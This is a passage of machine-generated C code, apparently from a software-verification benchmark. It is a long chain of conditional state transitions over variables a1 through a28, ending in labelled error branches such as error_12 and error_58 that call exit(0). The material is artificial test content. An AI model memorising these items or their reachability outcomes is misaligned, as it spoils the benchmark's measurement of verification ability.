} else if((((((((a28==15)&&(((input==3)&&((a26==18)||(a26==19)))&&(a25==1)))&&!(a3==1))&&!(a7==1))&&(a4==18))&&(a1==1))&&(a14==20))){
a7 = 1;
a3 = 1;
a4 = 16;
a14 = 18;
a26 = 17;
return -1;
} else if(((a14==19)&&(((a1==1)&&((((a4==18)&&((input==6)&&(((a26==17)&&!(a7==1))||(((a26==18)&&(a7==1))||((a7==1)&&(a26==19))))))&&(a3==1))&&(a28==17)))&&(a25==1)))){
a26 = 17;
a7 = 0;
return 22;
} else if(((a4==18)&&(((((((((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17)))&&(input==2))&&(a28==16))&&(a14==19))&&(a25==1))&&!(a3==1))&&(a1==1)))){
a26 = 17;
a4 = 16;
a7 = 1;
a14 = 18;
a28 = 15;
a3 = 1;
return -1;
} else if(((a25==1)&&((((a1==1)&&((a14==18)&&(((input==5)&&((((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17)))||((a26==18)&&!(a7==1))))&&(a4==17))))&&!(a3==1))&&(a28==17)))){
a3 = 1;
a4 = 16;
a7 = 1;
a28 = 15;
a26 = 17;
return -1;
} else if((((a25==1)&&((a7==1)&&(((((a14==18)&&(((a26==17)||(a26==18))&&(input==6)))&&(a4==17))&&!(a3==1))&&(a1==1))))&&(a28==17))){
a26 = 17;
a4 = 18;
a28 = 16;
a14 = 20;
a3 = 1;
return 26;
} else if(((a4==16)&&((!(a3==1)&&((a28==17)&&((a1==1)&&((input==5)&&(((a14==18)&&(!(a7==1)&&(a26==19)))||(((a26==17)&&(a7==1))&&(a14==19)))))))&&(a25==1)))){
a7 = 1;
a28 = 15;
a3 = 1;
a26 = 17;
a14 = 18;
return -1;
} else if(((a28==17)&&(((a26==18)&&(!(a7==1)&&((a4==18)&&((((a3==1)&&(input==4))&&(a25==1))&&(a1==1)))))&&(a14==19)))){
a7 = 1;
a28 = 16;
a26 = 17;
a14 = 20;
return 26;
} else if(((a25==1)&&(((a28==16)&&((a3==1)&&(((a4==17)&&((input==3)&&((!(a7==1)&&(a26==17))||(((a7==1)&&(a26==18))||((a26==19)&&(a7==1))))))&&(a1==1))))&&(a14==19)))){
a4 = 16;
a14 = 18;
a26 = 17;
a7 = 1;
a28 = 15;
return -1;
} else if((((a25==1)&&(((a14==20)&&(((a28==15)&&(((input==4)&&((a26==18)||(a26==19)))&&(a4==18)))&&(a1==1)))&&!(a3==1)))&&!(a7==1))){
a14 = 18;
a7 = 1;
a3 = 1;
a4 = 16;
a26 = 17;
return -1;
} else if((!(a3==1)&&(((a14==19)&&((a4==17)&&(((a1==1)&&(!(a7==1)&&((a25==1)&&(input==2))))&&(a28==15))))&&(a26==19)))){
a7 = 1;
a14 = 18;
a3 = 1;
a26 = 17;
a4 = 16;
return -1;
} else if(((a1==1)&&(((((((a14==19)&&((a4==18)&&(input==6)))&&(a25==1))&&(a28==16))&&(a26==18))&&!(a3==1))&&!(a7==1)))){
a26 = 17;
a28 = 15;
a14 = 20;
a3 = 1;
a4 = 16;
return -1;
} else if(((a4==18)&&((a1==1)&&(((a14==20)&&(((((!(a7==1)&&(a26==17))||(((a26==18)&&(a7==1))||((a26==19)&&(a7==1))))&&(input==1))&&(a25==1))&&(a3==1)))&&(a28==17))))){
a14 = 18;
a7 = 1;
a26 = 17;
a28 = 15;
a4 = 16;
return -1;
} else if(((a26==19)&&(!(a7==1)&&((a4==17)&&((a1==1)&&((((a28==17)&&((input==1)&&!(a3==1)))&&(a25==1))&&(a14==19))))))){
a14 = 18;
a26 = 17;
a28 = 15;
return 21;
} else if(((a28==17)&&((((a25==1)&&(((input==2)&&((((a7==1)&&(a26==18))&&(a14==20))||(((a14==19)&&(!(a7==1)&&(a26==19)))||(((a7==1)&&(a26==17))&&(a14==20)))))&&(a4==16)))&&!(a3==1))&&(a1==1)))){
a4 = 17;
a7 = 0;
a14 = 18;
a26 = 18;
a28 = 16;
return 22;
} return calculate_output4(input);
}
int calculate_output4(int input) {
if(((a25==1)&&((a28==17)&&((a14==18)&&(((((a26==17)&&((a4==16)&&(input==5)))&&!(a3==1))&&!(a7==1))&&(a1==1)))))){
a3 = 1;
a7 = 1;
a28 = 15;
return -1;
} else if(((a3==1)&&(((a1==1)&&((a28==16)&&(((a4==18)&&((input==1)&&((((a26==18)&&(a7==1))||((a26==19)&&(a7==1)))||(!(a7==1)&&(a26==17)))))&&(a14==18))))&&(a25==1)))){
a4 = 16;
a26 = 17;
a7 = 1;
a28 = 15;
return -1;
} else if(((!(a7==1)&&(((a25==1)&&(((((input==2)&&(((a26==17)||(a26==18))||(a26==19)))&&(a1==1))&&!(a3==1))&&(a28==17)))&&(a4==17)))&&(a14==20))){
a26 = 17;
a3 = 1;
a4 = 16;
a14 = 18;
a28 = 15;
a7 = 1;
return -1;
} else if(((a4==17)&&((a28==17)&&((a25==1)&&((a3==1)&&(((input==3)&&((((a14==19)&&(!(a7==1)&&(a26==18)))||(((a26==19)&&!(a7==1))&&(a14==19)))||(((a7==1)&&(a26==17))&&(a14==20))))&&(a1==1))))))){
a4 = 16;
a7 = 1;
a26 = 17;
a28 = 15;
a14 = 18;
return -1;
} else if(((a28==15)&&((a1==1)&&(((a25==1)&&(((a4==16)&&(((((a26==17)||(a26==18))||(a26==19))&&(input==5))&&!(a7==1)))&&!(a3==1)))&&(a14==18))))){
a26 = 17;
a3 = 1;
a7 = 1;
return -1;
} else if((((!(a7==1)&&((a4==17)&&((a14==19)&&((a1==1)&&((((a26==17)||(a26==18))&&(input==4))&&!(a3==1))))))&&(a28==16))&&(a25==1))){
a4 = 16;
a26 = 18;
a7 = 1;
a28 = 17;
return 26;
} else if((!(a3==1)&&(((a14==20)&&((a25==1)&&((a1==1)&&(((input==4)&&(((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17))))&&(a4==18)))))&&(a28==16)))){
a28 = 17;
a26 = 18;
a14 = 18;
a7 = 1;
return 24;
} else if(((((a1==1)&&((((a14==19)&&((input==3)&&((((a7==1)&&(a26==19))||((a26==17)&&!(a7==1)))||((a26==18)&&!(a7==1)))))&&(a28==16))&&!(a3==1)))&&(a25==1))&&(a4==16))){
a28 = 15;
a3 = 1;
a26 = 17;
a7 = 1;
a14 = 18;
return -1;
} else if(((a3==1)&&((((a28==17)&&(((a14==18)&&((input==3)&&(((a26==17)&&!(a7==1))||(((a26==18)&&(a7==1))||((a7==1)&&(a26==19))))))&&(a1==1)))&&(a25==1))&&(a4==18)))){
a4 = 16;
a28 = 15;
a26 = 17;
a7 = 1;
return -1;
} else if(((a28==16)&&(((a4==16)&&(((a25==1)&&((input==5)&&((((a7==1)&&(a26==18))&&(a14==20))||(((a14==19)&&(!(a7==1)&&(a26==19)))||((a14==20)&&((a26==17)&&(a7==1)))))))&&(a1==1)))&&!(a3==1)))){
a3 = 1;
a14 = 18;
a7 = 1;
a28 = 15;
a26 = 17;
return -1;
} else if(((a4==16)&&((((a14==20)&&(!(a3==1)&&((a28==17)&&((((a26==19)&&(a7==1))||((a26==17)&&!(a7==1)))&&(input==6)))))&&(a25==1))&&(a1==1)))){
a26 = 17;
a3 = 1;
a14 = 18;
a7 = 1;
a28 = 15;
return -1;
} else if(((((a14==19)&&((a1==1)&&((a28==16)&&(((((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17)))&&(input==4))&&(a4==18)))))&&!(a3==1))&&(a25==1))){
a4 = 16;
a26 = 17;
a7 = 0;
a3 = 1;
a14 = 20;
return -1;
} else if(((a25==1)&&(((!(a3==1)&&((((a28==16)&&((input==6)&&(((a26==17)||(a26==18))||(a26==19))))&&(a1==1))&&(a4==17)))&&(a14==19))&&(a7==1)))){
a14 = 18;
a7 = 0;
a28 = 17;
a26 = 19;
return 26;
} else if((((a7==1)&&((a25==1)&&(!(a3==1)&&((((((a26==17)||(a26==18))&&(input==5))&&(a28==16))&&(a14==18))&&(a1==1)))))&&(a4==18))){
a4 = 16;
a28 = 15;
a26 = 17;
a3 = 1;
return -1;
} else if((((a4==17)&&(((((((((a26==19)&&(a7==1))||((a26==17)&&!(a7==1)))||(!(a7==1)&&(a26==18)))&&(input==1))&&(a25==1))&&(a1==1))&&(a14==18))&&!(a3==1)))&&(a28==17))){
a14 = 19;
a7 = 0;
a28 = 16;
a26 = 18;
return 24;
} else if(((a28==16)&&(!(a7==1)&&((a26==19)&&((a25==1)&&(!(a3==1)&&((a14==19)&&(((input==4)&&(a1==1))&&(a4==17))))))))){
a26 = 18;
a28 = 17;
return 23;
} else if((((a4==18)&&(((a28==16)&&((a25==1)&&((a14==18)&&((input==4)&&((((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17)))||((a26==18)&&!(a7==1)))))))&&!(a3==1)))&&(a1==1))){
a7 = 1;
a3 = 1;
a26 = 17;
a4 = 16;
a28 = 15;
return -1;
} else if(((a28==15)&&(!(a3==1)&&((a1==1)&&((a4==18)&&(((((!(a7==1)&&(a26==19))&&(a14==18))||(((a7==1)&&(a26==17))&&(a14==19)))&&(input==4))&&(a25==1))))))){
a26 = 19;
a14 = 19;
a7 = 0;
return 22;
} else if((((a25==1)&&((a28==16)&&((a4==16)&&((a1==1)&&((input==2)&&(((a14==20)&&((a26==18)&&(a7==1)))||((((a26==19)&&!(a7==1))&&(a14==19))||((a14==20)&&((a26==17)&&(a7==1))))))))))&&!(a3==1))){
a14 = 18;
a7 = 1;
a28 = 15;
a26 = 17;
a3 = 1;
return -1;
} else if(((a4==18)&&(!(a7==1)&&(((a26==18)&&(((((a3==1)&&(input==2))&&(a28==17))&&(a1==1))&&(a14==19)))&&(a25==1))))){
a26 = 17;
a4 = 16;
a28 = 15;
a14 = 18;
a7 = 1;
return -1;
} else if((((a14==20)&&(((a3==1)&&(!(a7==1)&&((a25==1)&&(((input==6)&&((a26==18)||(a26==19)))&&(a28==16)))))&&(a4==17)))&&(a1==1))){
a28 = 15;
a14 = 18;
a26 = 17;
a4 = 16;
a7 = 1;
return -1;
} else if((((a1==1)&&((((a7==1)&&((a14==18)&&((a28==17)&&(((a26==17)||(a26==18))&&(input==6)))))&&(a4==18))&&(a25==1)))&&!(a3==1))){
a7 = 0;
a4 = 16;
a26 = 19;
a14 = 20;
a3 = 1;
return -1;
} else if((((((a1==1)&&((a4==17)&&((input==6)&&(((!(a7==1)&&(a26==19))&&(a14==19))||(((a26==17)&&(a7==1))&&(a14==20))))))&&(a25==1))&&(a28==15))&&(a3==1))){
a14 = 19;
a7 = 0;
a26 = 18;
a28 = 16;
return 23;
} else if((((a28==17)&&((((a3==1)&&((input==4)&&(((!(a7==1)&&(a26==19))&&(a14==18))||((a14==19)&&((a26==17)&&(a7==1))))))&&(a4==18))&&(a1==1)))&&(a25==1))){
a7 = 0;
a14 = 20;
a28 = 16;
a26 = 17;
return -1;
} else if(((a28==17)&&((a1==1)&&((a4==18)&&((a3==1)&&(((a25==1)&&(((input==6)&&!(a7==1))&&(a26==18)))&&(a14==18))))))){
a4 = 16;
a7 = 1;
a26 = 17;
a28 = 15;
return -1;
} else if(((((a3==1)&&((a14==19)&&((a28==15)&&(((a1==1)&&((input==1)&&((a26==17)||(a26==18))))&&!(a7==1)))))&&(a25==1))&&(a4==18))){
a14 = 18;
a4 = 16;
a7 = 1;
a26 = 17;
return -1;
} else if(((a1==1)&&(((a25==1)&&(((!(a3==1)&&((input==5)&&((!(a7==1)&&(a26==18))||(((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17))))))&&(a28==16))&&(a4==16)))&&(a14==19)))){
a14 = 18;
a7 = 1;
a28 = 15;
a26 = 17;
a3 = 1;
return -1;
} else if((((((a25==1)&&(((a26==18)&&((a4==18)&&((input==1)&&(a1==1))))&&(a28==15)))&&!(a3==1))&&!(a7==1))&&(a14==18))){
a7 = 1;
a26 = 17;
a3 = 1;
a4 = 16;
return -1;
} else if(((a4==17)&&((a28==16)&&(((a14==18)&&((!(a7==1)&&((a25==1)&&(((a26==18)||(a26==19))&&(input==6))))&&!(a3==1)))&&(a1==1))))){
a28 = 15;
a3 = 1;
a26 = 17;
a4 = 16;
a7 = 1;
return -1;
} else if((((a3==1)&&((a28==16)&&(((a1==1)&&((a14==18)&&(((((a26==18)&&(a7==1))||((a26==19)&&(a7==1)))||(!(a7==1)&&(a26==17)))&&(input==6))))&&(a4==17))))&&(a25==1))){
a26 = 19;
a4 = 18;
a28 = 15;
a14 = 19;
a7 = 1;
return 23;
} else if((((a25==1)&&((a1==1)&&((a4==17)&&((a3==1)&&((input==4)&&((((!(a7==1)&&(a26==18))&&(a14==18))||((a14==18)&&(!(a7==1)&&(a26==19))))||((a14==19)&&((a7==1)&&(a26==17)))))))))&&(a28==16))){
a14 = 19;
a28 = 15;
a26 = 17;
a4 = 18;
a7 = 0;
return 23;
} else if(((a14==19)&&((a25==1)&&(((a1==1)&&((((a28==15)&&((input==5)&&((a26==17)||(a26==18))))&&!(a3==1))&&!(a7==1)))&&(a4==16))))){
a3 = 1;
a14 = 18;
a7 = 1;
a26 = 17;
return -1;
} else if(((a28==16)&&((a14==18)&&((a4==16)&&((!(a3==1)&&((a25==1)&&((input==1)&&(((a7==1)&&(a26==19))||((a26==17)&&!(a7==1))))))&&(a1==1)))))){
a14 = 20;
a7 = 1;
a28 = 17;
a26 = 17;
return 26;
} else if(((((a26==19)&&((a7==1)&&((a3==1)&&((a25==1)&&((a28==15)&&((a1==1)&&(input==6)))))))&&(a14==20))&&(a4==18))){
a26 = 17;
a14 = 18;
a4 = 16;
return -1;
} else if(((((a4==17)&&((a14==19)&&((a7==1)&&(!(a3==1)&&((((a26==19)||((a26==17)||(a26==18)))&&(input==2))&&(a1==1))))))&&(a25==1))&&(a28==16))){
a28 = 17;
a7 = 0;
a26 = 17;
return 22;
} else if(((a4==17)&&(!(a3==1)&&(((a1==1)&&((input==4)&&((((!(a7==1)&&((a26==18)&&(a28==15)))&&(a14==20))||((!(a7==1)&&((a26==19)&&(a28==15)))&&(a14==20)))||(((a7==1)&&((a26==17)&&(a28==16)))&&(a14==18)))))&&(a25==1))))){
a26 = 17;
a14 = 19;
a28 = 16;
a7 = 0;
return 26;
} else if((((((((((input==3)&&(a26==17))&&(a25==1))&&(a1==1))&&(a14==20))&&!(a7==1))&&(a4==17))&&!(a3==1))&&(a28==15))){
a7 = 1;
a4 = 16;
a3 = 1;
a14 = 18;
return -1;
} else if(((((a3==1)&&((a28==17)&&((a14==19)&&((a4==17)&&((((a26==17)&&!(a7==1))||(((a26==18)&&(a7==1))||((a26==19)&&(a7==1))))&&(input==6))))))&&(a1==1))&&(a25==1))){
a28 = 15;
a26 = 17;
a7 = 1;
a4 = 16;
a14 = 18;
return -1;
} else if(((a7==1)&&((a1==1)&&((a28==17)&&((((a4==16)&&(((input==2)&&((a26==18)||(a26==19)))&&(a25==1)))&&!(a3==1))&&(a14==19)))))){
a7 = 0;
a4 = 17;
a28 = 15;
a26 = 17;
a14 = 20;
return 26;
} else if(((((a7==1)&&((a14==19)&&((a1==1)&&(!(a3==1)&&(((a4==18)&&(input==3))&&(a28==15))))))&&(a25==1))&&(a26==18))){
a26 = 17;
a28 = 16;
a14 = 20;
a3 = 1;
return 26;
} else if((((a4==17)&&((a28==17)&&((a14==20)&&((!(a7==1)&&((a1==1)&&((((a26==17)||(a26==18))||(a26==19))&&(input==6))))&&!(a3==1)))))&&(a25==1))){
a14 = 18;
a3 = 1;
a28 = 15;
a4 = 16;
a7 = 1;
a26 = 17;
return -1;
} else if(((((((a1==1)&&(((((a14==18)&&((a26==18)&&!(a7==1)))||((a14==18)&&(!(a7==1)&&(a26==19))))||(((a7==1)&&(a26==17))&&(a14==19)))&&(input==3)))&&(a3==1))&&(a4==17))&&(a28==17))&&(a25==1))){
a26 = 17;
a4 = 16;
a14 = 18;
a7 = 1;
a28 = 15;
return -1;
} else if((((a3==1)&&((a25==1)&&((a1==1)&&(((a14==18)&&((a4==18)&&((a26==18)&&(input==3))))&&(a28==17)))))&&!(a7==1))){
a28 = 15;
a4 = 16;
a7 = 1;
a26 = 17;
return -1;
} else if((((a14==19)&&((a4==17)&&((((!(a3==1)&&((input==3)&&!(a7==1)))&&(a1==1))&&(a26==19))&&(a25==1))))&&(a28==15))){
a26 = 18;
a7 = 1;
a14 = 18;
return 26;
} else if(((a4==17)&&(((a7==1)&&((((a3==1)&&((a25==1)&&((input==4)&&(a14==20))))&&(a28==15))&&(a26==18)))&&(a1==1)))){
a28 = 16;
a7 = 0;
return 24;
} else if(((a4==18)&&((a3==1)&&(((((input==2)&&((((a26==19)&&!(a7==1))&&(a14==18))||((a14==19)&&((a26==17)&&(a7==1)))))&&(a28==17))&&(a25==1))&&(a1==1))))){
a7 = 1;
a28 = 16;
a14 = 20;
a26 = 19;
return -1;
} else if(((a25==1)&&((a1==1)&&((((a26==18)&&((((a14==20)&&(input==6))&&(a3==1))&&(a4==17)))&&(a28==17))&&(a7==1))))){
a4 = 16;
a28 = 15;
a14 = 18;
a26 = 17;
return -1;
} else if(((((a26==19)&&(((((a1==1)&&((input==4)&&(a28==15)))&&!(a7==1))&&(a4==16))&&(a25==1)))&&!(a3==1))&&(a14==19))){
a26 = 17;
a3 = 1;
a14 = 18;
a7 = 1;
return -1;
} else if(((((input==2)&&((((!(a7==1)&&((a28==17)&&((a26==19)&&((a3==1)&&(a4==18)))))&&(a14==20))||((a14==18)&&((a7==1)&&((a28==15)&&((!(a3==1)&&(a4==16))&&(a26==17))))))||(((a7==1)&&((a28==15)&&((a26==18)&&((a4==16)&&!(a3==1)))))&&(a14==18))))&&(a1==1))&&(a25==1))){
a28 = 15;
a14 = 18;
a3 = 1;
a7 = 1;
a4 = 16;
a26 = 17;
return -1;
} else if(((a4==18)&&(((a1==1)&&((!(a7==1)&&((a14==19)&&((a25==1)&&((input==2)&&((a26==17)||(a26==18))))))&&(a28==15)))&&(a3==1)))){
a26 = 18;
a14 = 20;
a28 = 17;
return 24;
} else if(((((a25==1)&&((a4==16)&&(((a14==20)&&((((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17)))&&(input==1)))&&!(a3==1))))&&(a28==17))&&(a1==1))){
a7 = 1;
a28 = 15;
a14 = 18;
a26 = 17;
a3 = 1;
return -1;
} else if((((a4==18)&&((((a14==18)&&(((((a26==18)||(a26==19))&&(input==6))&&(a28==15))&&(a1==1)))&&(a25==1))&&(a7==1)))&&(a3==1))){
a4 = 16;
a26 = 17;
return -1;
} else if(((a3==1)&&((a25==1)&&((a28==17)&&((((input==4)&&((((a14==19)&&((a26==18)&&!(a7==1)))||((a14==19)&&(!(a7==1)&&(a26==19))))||(((a7==1)&&(a26==17))&&(a14==20))))&&(a1==1))&&(a4==17)))))){
a4 = 18;
a28 = 16;
a26 = 19;
a7 = 0;
a14 = 19;
return 23;
} else if(((((((a26==19)&&((a14==19)&&((a4==17)&&((input==6)&&(a25==1)))))&&!(a7==1))&&(a1==1))&&(a28==16))&&!(a3==1))){
a4 = 16;
a7 = 1;
a28 = 15;
a14 = 18;
a3 = 1;
a26 = 17;
return -1;
} else if(((a26==17)&&((a1==1)&&((((((!(a3==1)&&(input==3))&&(a14==18))&&(a28==17))&&!(a7==1))&&(a25==1))&&(a4==16))))){
a7 = 1;
a3 = 1;
a28 = 15;
return -1;
} else if(((a4==16)&&(((a26==17)&&((a14==19)&&(((a28==17)&&((!(a7==1)&&(input==4))&&(a1==1)))&&!(a3==1))))&&(a25==1)))){
a14 = 18;
a7 = 1;
a28 = 15;
a3 = 1;
return -1;
} else if(((a4==17)&&(((((((a1==1)&&((a3==1)&&(input==5)))&&(a14==19))&&(a7==1))&&(a26==18))&&(a25==1))&&(a28==15)))){
a14 = 20;
a26 = 19;
return 22;
} else if((!(a3==1)&&((a4==18)&&((((a14==18)&&((a28==16)&&((input==1)&&((((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17)))||(!(a7==1)&&(a26==18))))))&&(a25==1))&&(a1==1))))){
a14 = 19;
a26 = 18;
a7 = 1;
return 22;
} else if((((a7==1)&&((a3==1)&&((a14==20)&&((a25==1)&&((a4==17)&&(((input==6)&&(a26==18))&&(a28==15)))))))&&(a1==1))){
a26 = 17;
a7 = 0;
a28 = 16;
return 24;
} else if(((a25==1)&&(((a1==1)&&((a28==15)&&((a26==17)&&((a4==18)&&(((a14==20)&&(input==6))&&(a3==1))))))&&!(a7==1)))){
a4 = 16;
a7 = 1;
a14 = 18;
return -1;
} else if((((a4==18)&&((a3==1)&&((a28==15)&&((((a25==1)&&((a1==1)&&(input==5)))&&(a7==1))&&(a26==17)))))&&(a14==19))){
a28 = 17;
a7 = 0;
a26 = 18;
return 22;
} else if((((a26==19)&&((a1==1)&&((a14==18)&&(((((input==5)&&(a25==1))&&!(a3==1))&&(a4==16))&&(a7==1)))))&&(a28==17))){
a3 = 1;
a26 = 17;
a28 = 15;
return -1;
} else if((((a1==1)&&((a4==17)&&((a28==17)&&((a14==20)&&((!(a3==1)&&((((a26==17)||(a26==18))||(a26==19))&&(input==4)))&&(a7==1))))))&&(a25==1))){
a3 = 1;
a28 = 15;
a14 = 18;
a26 = 17;
a4 = 16;
return -1;
} else if((!(a7==1)&&((!(a3==1)&&((((a28==17)&&((a14==19)&&((a26==18)&&(input==3))))&&(a25==1))&&(a1==1)))&&(a4==16)))){
a3 = 1;
a7 = 1;
a14 = 18;
a28 = 15;
a26 = 17;
return -1;
} else if((((a4==18)&&((a14==20)&&((a26==18)&&(((a1==1)&&((a25==1)&&((a3==1)&&(input==4))))&&!(a7==1)))))&&(a28==17))){
a4 = 16;
a14 = 18;
a28 = 15;
a7 = 1;
a26 = 17;
return -1;
} else if((!(a3==1)&&((a4==18)&&(!(a7==1)&&((a25==1)&&((a28==16)&&(((a1==1)&&((input==2)&&((a26==18)||(a26==19))))&&(a14==20)))))))){
a14 = 18;
a28 = 15;
a4 = 17;
a26 = 18;
return 23;
} else if(((a4==18)&&((a26==17)&&(((a14==19)&&(((a25==1)&&(((a7==1)&&(input==3))&&(a3==1)))&&(a28==15)))&&(a1==1))))){
a4 = 16;
a14 = 18;
return -1;
} else if(((a25==1)&&(((a4==18)&&((((a3==1)&&((((a26==17)&&!(a7==1))||(((a26==18)&&(a7==1))||((a26==19)&&(a7==1))))&&(input==3)))&&(a28==16))&&(a1==1)))&&(a14==19)))){
a26 = 17;
a28 = 15;
a14 = 18;
a4 = 16;
a7 = 1;
return -1;
} else if((!(a3==1)&&(!(a7==1)&&((a25==1)&&((a1==1)&&((a28==17)&&((a14==18)&&(((input==2)&&(a26==17))&&(a4==16))))))))){
a3 = 1;
a28 = 15;
a7 = 1;
return -1;
} else if((((a14==18)&&((((a1==1)&&((a4==17)&&((((a26==19)&&(a7==1))||((a26==17)&&!(a7==1)))&&(input==1))))&&(a28==17))&&(a25==1)))&&(a3==1))){
a28 = 15;
a7 = 1;
a4 = 16;
a26 = 17;
return -1;
} else if((((a1==1)&&((((((((!(a7==1)&&(a26==19))&&(a14==18))||(((a7==1)&&(a26==17))&&(a14==19)))||((a14==19)&&((a26==18)&&(a7==1))))&&(input==4))&&(a28==17))&&(a25==1))&&(a4==18)))&&!(a3==1))){
a26 = 18;
a14 = 19;
a7 = 1;
return 24;
} else if(((a1==1)&&(!(a3==1)&&((a4==16)&&(((a14==19)&&(((a28==17)&&(((a26==18)||(a26==19))&&(input==3)))&&(a7==1)))&&(a25==1)))))){
a14 = 18;
a28 = 15;
a3 = 1;
a26 = 17;
return -1;
} else if(((a25==1)&&((a1==1)&&((((a28==17)&&((input==5)&&((((!(a7==1)&&(a26==18))&&(a14==18))||((a14==18)&&((a26==19)&&!(a7==1))))||(((a7==1)&&(a26==17))&&(a14==19)))))&&(a3==1))&&(a4==17))))){
a14 = 18;
a28 = 15;
a7 = 1;
a4 = 16;
a26 = 17;
return -1;
} else if(((a25==1)&&((a26==18)&&(((a4==16)&&(((((input==2)&&(a28==16))&&(a1==1))&&(a7==1))&&!(a3==1)))&&(a14==18))))){
a26 = 17;
a28 = 15;
a3 = 1;
return -1;
} else if(((!(a3==1)&&((((a7==1)&&((((a14==18)&&(input==6))&&(a1==1))&&(a4==16)))&&(a26==19))&&(a28==17)))&&(a25==1))){
a28 = 15;
a26 = 17;
a3 = 1;
return -1;
} else if(((a25==1)&&(((a4==18)&&((a28==15)&&((a1==1)&&(((a26==18)&&((a3==1)&&(input==6)))&&(a7==1)))))&&(a14==19)))){
a26 = 17;
a4 = 16;
a14 = 18;
return -1;
} else if(((a14==18)&&((a25==1)&&((a28==16)&&(((((input==3)&&(((a26==18)&&!(a7==1))||(((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17)))))&&(a1==1))&&(a4==18))&&!(a3==1)))))){
a28 = 15;
a3 = 1;
a26 = 17;
a7 = 1;
a4 = 16;
return -1;
} else if((((a3==1)&&((((((((a26==19)&&(a4==17))&&(a28==17))&&!(a7==1))&&(a14==20))||((a14==18)&&((((a26==17)&&(a4==18))&&(a28==15))&&(a7==1))))&&(input==6))&&(a1==1)))&&(a25==1))){
a28 = 15;
a14 = 18;
a26 = 17;
a7 = 1;
a4 = 16;
return -1;
} else if(((a14==20)&&((a1==1)&&((((a25==1)&&(((((a7==1)&&(a26==19))||((a26==17)&&!(a7==1)))&&(input==5))&&(a28==17)))&&(a4==16))&&!(a3==1))))){
a7 = 1;
a14 = 18;
a26 = 17;
a28 = 15;
a3 = 1;
return -1;
} else if(((!(a3==1)&&((a7==1)&&(((((((a26==18)||(a26==19))&&(input==5))&&(a4==17))&&(a14==18))&&(a25==1))&&(a1==1))))&&(a28==15))){
a28 = 16;
a14 = 20;
a4 = 18;
a3 = 1;
a26 = 17;
return -1;
} else if((((a4==16)&&((!(a3==1)&&((a25==1)&&((((a14==20)&&((a26==18)&&(a7==1)))||((((a26==19)&&!(a7==1))&&(a14==19))||((a14==20)&&((a7==1)&&(a26==17)))))&&(input==1))))&&(a1==1)))&&(a28==16))){
a26 = 18;
a14 = 18;
a4 = 17;
a7 = 0;
a28 = 15;
return 21;
} else if(((a1==1)&&((((((a28==15)&&((((a7==1)&&(a26==19))||((a26==17)&&!(a7==1)))&&(input==4)))&&(a14==19))&&!(a3==1))&&(a25==1))&&(a4==18)))){
a7 = 1;
a26 = 18;
a14 = 20;
return 24;
} else if((((!(a3==1)&&((((((((a4==16)&&(a26==18))&&(a28==17))&&!(a7==1))&&(a14==20))||((a14==20)&&((((a26==19)&&(a4==16))&&(a28==17))&&!(a7==1))))||((a14==18)&&((((a26==17)&&(a4==17))&&(a28==15))&&(a7==1))))&&(input==6)))&&(a1==1))&&(a25==1))){
a26 = 17;
a14 = 18;
a4 = 16;
a7 = 1;
a28 = 15;
a3 = 1;
return -1;
} else if((((a26==18)&&((((a14==19)&&((a25==1)&&((a1==1)&&((a4==17)&&(input==5)))))&&(a28==15))&&!(a3==1)))&&!(a7==1))){
a3 = 1;
a14 = 18;
a7 = 1;
a26 = 17;
a4 = 16;
return -1;
} else if(((a1==1)&&((a25==1)&&(((a28==17)&&(((a14==18)&&((a7==1)&&((input==2)&&(a26==18))))&&(a4==16)))&&!(a3==1))))){
return 22;
} else if((((a25==1)&&((a3==1)&&((a4==18)&&((a14==20)&&((((input==5)&&(a1==1))&&(a26==17))&&(a7==1))))))&&(a28==16))){
a4 = 16;
a14 = 18;
a28 = 15;
return -1;
} else if((((a3==1)&&((a25==1)&&((a7==1)&&((a14==18)&&((a28==17)&&((a4==17)&&((input==1)&&((a26==17)||(a26==18)))))))))&&(a1==1))){
a28 = 15;
a4 = 16;
a26 = 17;
return -1;
} else if(((a1==1)&&((a25==1)&&(!(a3==1)&&((((a14==18)&&((((a4==17)&&(a26==17))&&(a28==15))&&(a7==1)))||(((!(a7==1)&&(((a26==18)&&(a4==16))&&(a28==17)))&&(a14==20))||((a14==20)&&(!(a7==1)&&(((a4==16)&&(a26==19))&&(a28==17))))))&&(input==3)))))){
a3 = 1;
a14 = 18;
a7 = 1;
a28 = 15;
a26 = 17;
a4 = 16;
return -1;
} else if(((a28==17)&&((a14==20)&&((a4==16)&&((((a25==1)&&((((a7==1)&&(a26==19))||((a26==17)&&!(a7==1)))&&(input==3)))&&(a1==1))&&!(a3==1)))))){
a26 = 17;
a7 = 1;
a28 = 15;
a14 = 18;
a3 = 1;
return -1;
} else if((((a4==18)&&((a14==19)&&((a28==17)&&((a25==1)&&(((input==4)&&((((a26==18)&&(a7==1))||((a7==1)&&(a26==19)))||(!(a7==1)&&(a26==17))))&&(a3==1))))))&&(a1==1))){
a7 = 1;
a14 = 20;
a28 = 16;
a26 = 18;
return -1;
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==18))&&(a28==15))&&(a7==1))&&(a14==20))){
error_12: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==19))&&(a28==16))&&(a7==1))&&(a14==18))){
error_19: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==19))&&(a28==16))&&(a7==1))&&(a14==20))){
error_31: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==18))&&(a28==17))&&!(a7==1))&&(a14==18))){
error_39: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==19))&&(a28==17))&&!(a7==1))&&(a14==20))){
error_52: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==18))&&(a28==15))&&(a7==1))&&(a14==19))){
error_6: exit(0);
}
if(((((((((a3==1)&&(a4==17))&&(a25==1))&&(a1==1))&&(a26==19))&&(a28==15))&&!(a7==1))&&(a14==18))){
error_58: exit(0);
}
